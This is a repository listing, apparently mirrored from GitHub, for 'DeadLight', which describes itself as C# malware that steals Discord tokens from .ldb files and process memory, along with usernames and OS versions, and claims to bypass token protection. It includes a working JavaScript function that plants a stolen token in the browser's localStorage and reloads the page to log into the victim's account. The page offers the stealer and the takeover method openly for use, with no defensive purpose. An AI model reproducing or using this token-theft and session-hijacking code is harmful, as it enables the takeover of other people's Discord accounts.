GitHunt
ZE

ZeroMemoryEx/DeadLight

Simple C# malware that steals Discord token from .ldb files and from memory

Discord-Token-Grabber

Token-Stealer

Features

  • Steal
    • Token directly From memory
    • Token from ldb files
    • username
    • os version
    • bypass any kind of token protection

How to login using token

function login(token) {
setInterval(() => {
document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`
}, 50);
setTimeout(() => {
location.reload();
}, 2500);
}
  • use login("token"); then refresh the webpage ,and you will login automatically to the account using only token

Languages

C#100.0%

Contributors

Created May 16, 2021
Updated February 21, 2026
ZeroMemoryEx/DeadLight | GitHunt